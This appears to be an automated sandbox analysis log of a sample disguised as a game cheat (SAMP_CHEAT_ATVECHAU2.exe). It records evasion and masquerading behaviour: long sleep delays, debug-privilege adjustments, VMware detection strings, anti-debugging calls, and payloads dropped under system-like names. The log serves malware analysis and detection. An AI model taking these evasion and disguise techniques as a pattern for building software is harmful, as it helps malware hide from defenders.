                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Memory allocated: 1920000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Memory allocated: 1B3B0000 memory reserve | memory write watch
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe	Memory allocated: 1760000 memory reserve | memory write watch
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe	Memory allocated: 1B2E0000 memory reserve | memory write watch
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe	Memory allocated: 1630000 memory reserve | memory write watch
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe	Memory allocated: 1B020000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Memory allocated: 1900000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Memory allocated: 1B360000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Memory allocated: 1820000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Memory allocated: 1B370000 memory reserve | memory write watch
                                    Source: C:\Recovery\services.exe	Memory allocated: D50000 memory reserve | memory write watch
                                    Source: C:\Recovery\services.exe	Memory allocated: 1A8A0000 memory reserve | memory write watch
                                    Source: C:\Recovery\services.exe	Memory allocated: 32F0000 memory reserve | memory write watch
                                    Source: C:\Recovery\services.exe	Memory allocated: 1B2F0000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Thread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe	Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\services.exe	Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1880
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1955
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1342
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1419
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1329
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1508
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1565
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1407
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1515
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1523
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1458
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1349
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1412
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1463
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1375
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1185
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1265
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1517
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3471
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fSPDjruA.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VrgGeyQY.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VjwnzPpT.log
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MGoyPVal.log
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EcfIfcKE.log
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vyXTwjuX.log
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe TID: 4324	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe TID: 6660	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe TID: 4636	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928	Thread sleep count: 1880 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9080	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8768	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep count: 1955 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8736	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116	Thread sleep count: 1342 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9060	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024	Thread sleep count: 1419 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9036	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8720	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep count: 1329 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9064	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8800	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120	Thread sleep count: 1508 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792	Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1092	Thread sleep count: 1565 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9056	Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512	Thread sleep count: 1407 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8856	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348	Thread sleep count: 1515 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684	Thread sleep count: 1523 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9072	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172	Thread sleep count: 1458 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8264	Thread sleep count: 1349 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9088	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8744	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464	Thread sleep count: 1412 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9084	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8324	Thread sleep count: 1463 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9044	Thread sleep time: -8301034833169293s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8384	Thread sleep count: 1375 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9092	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8752	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352	Thread sleep count: 1185 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9076	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8848	Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440	Thread sleep count: 1265 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9040	Thread sleep time: -11068046444225724s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612	Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348	Thread sleep count: 1517 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9048Thread sleep time: -8301034833169293s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412Thread sleep count: 3471 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9024Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe TID: 9016Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe TID: 7012Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\services.exe TID: 9192Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\services.exe TID: 9184Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\services.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\services.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CFA69B
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D0C220
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D1B348 FindFirstFileExA,0_2_00D1B348
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0E6A3 VirtualQuery,GetSystemInfo,0_2_00D0E6A3
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: wscript.exe, 00000002.00000003.1282078732.0000000003627000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: jnowHpJlZlXal.exe.10.drBinary or memory string: EW56lxcP6maaZ8RVmCi8
                                    Source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1691094057.000000001C528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_0-25126
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D0F838
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D17DEE mov eax, dword ptr fs:[00000030h]0_2_00D17DEE
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D1C030 GetProcessHeap,0_2_00D1C030
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess token adjusted: Debug
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\services.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\services.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D0F838
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F9D5 SetUnhandledExceptionFilter,0_2_00D0F9D5
